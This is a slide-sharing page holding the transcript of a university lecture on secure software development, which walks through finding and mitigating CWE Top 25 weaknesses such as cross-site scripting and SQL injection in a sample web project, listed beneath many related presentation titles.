Secure Software Development Mini Zeng University of Alabama in Huntsville 1.

Slides:

Advertisements

Similar presentations

Preventing Web Application Injections with Complementary Character Coding Raymond Mui Phyllis Frankl Polytechnic Institute of NYU Presented at ESORICS.

Advertisements

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

SEC835 OWASP Top Ten Project.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,

CERN – European Organization for Nuclear Research GS Department – Administrative Information Services Secure software development for the World Wide Web.

An Evaluation of the Google Chrome Extension Security Architecture

Professor Michael J. Losacco CIS 1150 – Introduction to Computer Information Systems Programming and Languages Chapter 13.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

IDAsec copyright - all rights reserved1 Web Vulnerabilities in the real world.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

SSH : The Secure Shell By Rachana Maheswari CS265 Spring 2003.

CS 290C: Formal Models for Web Software Lecture 1: Introduction Instructor: Tevfik Bultan.

CERN – European Organization for Nuclear Research GS Department – Administrative Information Services Secure software development for the World Wide Web.

Geneva, Switzerland, September 2014 ITU-T CYBEX standards for cybersecurity and data protection Youki Kadobayashi, NICT Japan Rapporteur, ITU-T Q.4/17.

Security in SQL Jon Holmes CIS 407 Fall Outline Surface Area Connection Strings Authenticating Permissions Data Storage Injections.

09/18/06 1 Software Security Vulnerability Testing in Hostile Environment Herbert H. Thompson James A. Whittaker Florence E. Mottay.

Varun Sharma Security Engineer | ACE Team | Microsoft Information Security

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.

Software Engineering for Secure Systems Individual Research Project Hiram Garcia.

The OWASP Way Understanding the OWASP Vision and the Top Ten.

Security Management prepared by Dean Hipwell, CISSP

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Security testing of study information system Security team: Matis Alliksoo Alo Konno Urmo Lihten Taavi Podzuks Sander Saarm.

Configuring Electronic Health Records Privacy and Security in the US Lecture f This material (Comp11_Unit7f) was developed by Oregon Health & Science University,

Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

OSI and TCP/IP Models And Some Vulnerabilities AfNOG th May 2011 – 10 th June 2011 Tanzania By Marcus K. G. Adomey.

Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.

Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim

1 Vulnerability Assessment of Grid Software James A. Kupsch Computer Sciences Department University of Wisconsin Condor Week 2007 May 2, 2007.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.

SQL INJECTIONS Presented By: Eloy Viteri. What is SQL Injection An SQL injection attack is executed when a web page allows users to enter text into a.

Web Applications Testing By Jamie Rougvie Supported by.

Building Secure Web Applications With ASP.Net MVC.

The OWASP Foundation OWASP Education Computer based training 2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping Nishi Kumar.

Chapter 16 The World Wide Web. FIGURE 16.0.F01: A very, very simple Web page. Courtesy of Dr. Richard Smith.

PwC New Technologies New Risks. PricewaterhouseCoopers Technology and Security Evolution Mainframe Technology –Single host –Limited Trusted users Security.

COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 1COMP9321, 15s2, Week.

CS526Topic 12: Web Security (2)1 Information Security CS 526 Topic 9 Web Security Part 2.

Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.

PHP Error Handling & Reporting. Error Handling Never allow a default error message or error number returned by the mysql_error() and mysql_errno() functions.

Chapter 1 The Software Security Problem. Goals of this course Become aware of common pitfalls. Static Analysis and tools.

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security.

JavaScript 101 Introduction to Programming. Topics What is programming? The common elements found in most programming languages Introduction to JavaScript.

PCI DSS and PA-DSS OWASP Education Nishi Kumar Computer based training

EECS 354: Network Security Group Members: Patrick Wong Eric Chan Shira Schneidman Web Attacks Project: Detecting XSS and SQL Injection Vulnerabilities.

SANS Top 25 Most Dangerous Programming Errors Catagory 1: Insecure Interaction Between Components These weaknesses are related to insecure ways.

Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.

ITU-T CYBEX standards for cybersecurity information dissemination and exchange Youki Kadobayashi, Ph.D. NICT Japan / Rapporteur, ITU-T SG17 Q.4 ITU-T SG17.

The Postman Always Rings Twice: Attacking and Defending postMessage in HTML5 Websites Paper by Sooel Son and Vitaly Shmatikov, The University of Texas.

Page 1 Ethical Hacking by Douglas Williams. Page 2 Intro Attackers can potentially use many different paths through your application to do harm to your.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

COMP9321 Web Application Engineering Semester 2, 2017

Web Application Security

Building Secure ColdFusion Applications

Web Application Vulnerabilities

Web Application Vulnerabilities, Detection Mechanisms, and Defenses

Theodore Lawson CSCE548 Student Presentation, Topic #2

SE604: Software Testing and QA Secure SW Development for QA Lecture#3

OWASP Secure Coding Practices Quick Reference Guide

Security Issues CS 560 Lecture 9.

CS2S562 Secure Software Development

Presentation transcript:

Secure Software Development Mini Zeng University of Alabama in Huntsville 1

Outline  Introduction  Sample project ShareAlbum  Step by step instructions  Errors and mitigations  Discussion 2

Introduction Common Weakness Enumeration (CWE) provides a unified, measurable set of software weaknesses. The 2011 CWE/SANS Top 25 Most Dangerous Software Errors is a list of the most widespread and critical errors that can lead to serious vulnerabilities in software. 3

Step by step instructions: STEP 1 STEP 1 Go through the CWE website and identify potential software errors that exist in the program according to brief list of Top 25 Most Dangerous Software Errors. Automatic tools such as RIPS could be used to establish a raw error list. CWE-79: Cross-site Scripting CWE-89: SQL Injection CWE-862: Missing Authorization CWE-798: Use of Hard-coded Credentials CWE-311: Missing Encryption of Sensitive Data CWE-434: Unrestricted Upload of File with Dangerous Type CWE-22: Path Traversal CWE-759: Use of a One-Way Hash without a Salt CWE-327: Use of a Broken or Risky Cryptographic Algorithm 4

Step by Step Instructions: STEP 2 STEP 2 For each error, check summary to find out errors with high attacker awareness, often attack frequency and low or medium prevent cost to fix in the first place. 5

Step by Step Instructions: Example 6

Step by Step Instructions: STEP 3 STEP 3 Check the Technique Details sections of the errors. Select the list of the errors to mitigate. Check the applicable platform part to find out if the error is applicable for your application. Check the code examples in the technical details. Often, they are helpful. STEP 4 Decide mitigation approaches and document the list of errors to fix, go through all your project code to mitigate them. 7

Errors and Mitigations: CWE-79 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') If you are not careful, attackers may inject javascript or other browser executable script into your web page 8

Errors and Mitigations: CWE-89 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') If attackers can influence the SQL that you use to communicate with your database, then suddenly all your fun and profit belongs to them. 9

Errors and Mitigations: CWE-862 CWE-862 Missing Authorization : Users are often assigned different privileges. Programmers did not check the authentication to make sure that the user is authenticated to make some action. 10

Discussions  CWE-22: Improper limitation of a pathname to a restricted directory ('Path Traversal').  CWE-434: Unrestricted upload of file with dangerous type.  CWE-311: Missing encryption of sensitive data.  CWE-798: Use hard-code credentials may be convenient to our coding.  CWE-759: Use of a one-way hash without a salt.  CWE-327: Use of a broken or risky cryptographic algorithm. 11

12